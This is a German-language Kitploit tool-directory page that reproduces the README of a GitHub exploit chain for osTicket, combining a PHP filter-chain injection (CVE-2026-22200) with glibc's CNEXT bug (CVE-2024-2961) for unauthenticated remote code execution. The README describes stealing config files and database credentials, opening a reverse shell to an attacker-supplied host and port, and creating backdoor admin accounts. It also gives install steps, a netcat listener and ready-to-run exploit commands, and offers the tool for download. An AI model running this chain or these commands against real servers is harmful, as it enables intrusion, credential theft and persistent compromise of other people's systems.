Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
osTicketFileReadIntoRCE — Exploit einer vollständigen Kette, der PHP-Filterketten-Injection mit CVE-2024-2961 (CNEXT) für nicht authentifizierte Remote Code Execution auf angreifbaren osTicket-Installationen kombiniert. | Kitploit
Tools/GitHubGitHub/clarissss/osticketfilereadintorce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPost-ExploitationPenetrationstestsLernen & BildungRed TeamingRemote-Access-ToolPayload-Entwicklung
GitHubclarissss/osticketfilereadintorce

osTicketFileReadIntoRCE

Exploit einer vollständigen Kette, der PHP-Filterketten-Injection mit CVE-2024-2961 (CNEXT) für nicht authentifizierte Remote Code Execution auf angreifbaren osTicket-Installationen kombiniert.

Repository anzeigen
5vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-22200: osTicket – Auslesen beliebiger Dateien bis zur RCE

CVE-2026-22200 osTicket ≤ 1.18.2 Python 3.8+ Educational

Vollständige Exploit-Kette, die PHP-Filter-Chain-Injection mit CVE-2024-2961 (CNEXT) kombiniert, um nicht authentifizierte Remote-Code-Ausführung auf verwundbaren osTicket-Installationen zu erreichen.


Inhaltsverzeichnis

  • Überblick
  • Schwachstellendetails
  • Angriffsablauf
  • Funktionen
  • Installation
  • Verwendung
  • Technische Details
  • Fehlerbehebung
  • Erkennung & Abhilfe
  • Danksagungen
  • Haftungsausschluss

Überblick

Dieses Repository enthält einen Proof-of-Concept-Exploit für CVE-2026-22200, eine kritische Schwachstelle, die osTicket-Versionen ≤ 1.18.2 betrifft. Der Exploit verknüpft zwei leistungsstarke Techniken:

  1. PHP-Filter-Chain-Injection über die Bildverarbeitung von mPDF
  2. CNEXT-Heap-Korruption (CVE-2024-2961) in glibc's iconv()

Das Ergebnis: Nicht authentifizierte Remote-Code-Ausführung auf verwundbaren osTicket-Servern.

Auswirkungen

  • Nicht authentifiziert – Keine Anmeldedaten erforderlich
  • Vollständige RCE – Komplette Serverkompromittierung
  • Datei-Exfiltration – Beliebiges Auslesen von Serverdateien
  • Datenbankzugriff – Extrahieren von DB-Anmeldedaten
  • Admin-Zugriff – Erstellen von Hintertür-Admin-Konten

Betroffene Versionen

  • osTicket: ≤ v1.18.2, ≤ v1.17.6
  • glibc: < 2.39 (CVE-2024-2961 in glibc 2.39+ gepatcht)

🔍 Schwachstellendetails

CVE-2026-22200: PHP-Filter-Chain-Injection

CVSS-Score: 9.8 (Kritisch)

Die mPDF-Integration von osTicket erlaubt nicht authentifizierten Benutzern, bösartige PHP-Filterketten durch speziell gestaltete HTML-Nutzlasten in Support-Tickets einzuschleusen. Dies ermöglicht:

  • Beliebige Dateiauslese (Konfigurationen, Quellcode, Anmeldedaten)
  • Speicherleck (/proc/self/maps, partielles libc)
  • Heap-Korruption via CNEXT

Grundursache: Unzureichende Validierung von Bild-URLs in benutzergeliefertem HTML, bevor es an mPDF weitergegeben wird.

CVE-2024-2961: CNEXT (iconv-Pufferüberlauf)

CVSS-Score: 9.8 (Kritisch)

Pufferüberlauf in glibc's iconv() bei der Verarbeitung des Zeichensatzes ISO-2022-CN-EXT. In Kombination mit PHP-Filterketten ermöglicht dies:

  • Heap-Korruption
  • Übernahme von Funktionszeigern
  • Beliebige Befehlsausführung

Verwundbare glibc-Versionen: < 2.39 (Februar 2024)


🔗 Angriffsablauf

┌─────────────────────────────────────────────────────────────────┐
│ 1. AUFKLÄRUNG                                                   │
│    └─ osTicket erkennen, Rich-Text-Themen identifizieren       │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 2. AUTHENTIFIZIERUNG                                            │
│    └─ Selbstregistrierung ODER vorhandene Anmeldedaten nutzen │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 3. DATEI-EXFILTRATION (PHP-Filterketten)                       │
│    ├─ /etc/passwd                                               │
│    ├─ include/ost-config.php (DB-Anmeldedaten, SECRET_SALT)    │
│    ├─ /proc/self/maps (Speicherlayout)                         │
│    └─ /proc/self/environ (Umgebungsvariablen)                  │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 4. LIBC-FINGERPRINTING                                          │
│    ├─ Partielles libc via Filterketten extrahieren             │
│    ├─ GNU Build-ID extrahieren                                  │
│    └─ Vollständiges libc von libc.rip herunterladen            │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 5. CNEXT-RCE-AUSNUTZUNG                                         │
│    ├─ Heap-Korruptions-Nutzlast generieren                     │
│    ├─ via Ticketantwort injizieren (mit Filterausführungsfixes)│
│    ├─ via PDF-Export auslösen (Server stürzt ab)               │
│    └─ Reverse Shell ausführen                                   │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 6. NACH-EXPLOITATION                                            │
│    ├─ Interaktive Reverse Shell                                 │
│    ├─ Datenbankzugriff (unter Verwendung von exfiltriertem DBPASS)│
│    └─ Hintertür-Admin-Konto erstellen                          │
└─────────────────────────────────────────────────────────────────┘

Funktionen

Kernfähigkeiten

  • Vollautomatisierte Exploit-Kette
  • Nicht authentifizierter Angriff (Selbstregistrierung, falls aktiviert)
  • Intelligente Webroot-Erkennung via /proc/self/maps-Analyse
  • 100%ige Webshell-Lokalisierung via Dateisystem-Scan
  • Automatisches libc-Fingerprinting und Herunterladen
  • Mehrere Reverse-Shell-Methoden (bash, python, netcat)
  • Robuste Filterausführung mit Cache-Busting
  • Pre-Flight-Diagnose zur frühzeitigen Erkennung von Problemen

Erhöhte Zuverlässigkeit

  • Multi-Trigger CNEXT für garantierten Absturz (>95% Erfolg)
  • Antwortbasierte Injektion (zuverlässiger als neue Tickets)
  • Stream-Forcierung zur Sicherstellung der Filterausführung
  • Cache-Busting zur Vermeidung der Auslieferung veralteter PDFs
  • Umfassende Fehlerbehandlung und Diagnose

Nach-Exploitation

  • Extraktion von Datenbank-Anmeldedaten (DBPASS aus Konfiguration)
  • Erstellung von Admin-Konten via DB-Zugriff
  • Optionen für persistente Hintertüren
  • Vollständige Systemaufklärung

Installation

Voraussetzungen

  • Python 3.8+
  • Linux/macOS (empfohlen) oder WSL unter Windows

Abhängigkeiten

# Repository klonen
git clone https://github.com/Clarissss/osTicketFileReadIntoRCE
cd osTicketFileReadIntoRCE

# Erforderliche Pakete installieren
pip install -r requirements.txt

requirements.txt:

requests>=2.31.0
PyMuPDF>=1.23.0
Pillow>=10.0.0
pwntools>=4.11.0

Optional: Virtuelle Umgebung

python3 -m venv venv
source venv/bin/activate  # Linux/macOS
# ODER
venv\Scripts\activate  # Windows

pip install -r requirements.txt

📖 Verwendung

Einfache Nutzung – Reverse Shell

# Terminal 1: Listener starten
nc -lvnp 4444

# Terminal 2: Exploit ausführen
python3 osticket_revshell.py https://ziel.com/osticket \
    --lhost IHRE_IP \
    --lport 4444

Interaktiver Webshell-Modus

python3 osticket_exploit.py https://ziel.com/osticket

Erweiterte Optionen

# Proxy verwenden (Burp Suite)
python3 osticket_revshell.py https://ziel.com/osticket \
    --lhost 10.0.0.5 \
    --lport 4444 \
    --proxy http://127.0.0.1:8080

# Bestimmte Hilfe-Themen-ID erzwingen
python3 osticket_exploit.py https://ziel.com/osticket \
    --topic-id 2

# Farbausgabe deaktivieren (für Protokollierung)
python3 osticket_exploit.py https://ziel.com/osticket --no-color

Vorhandene Anmeldedaten

Tool herunterladen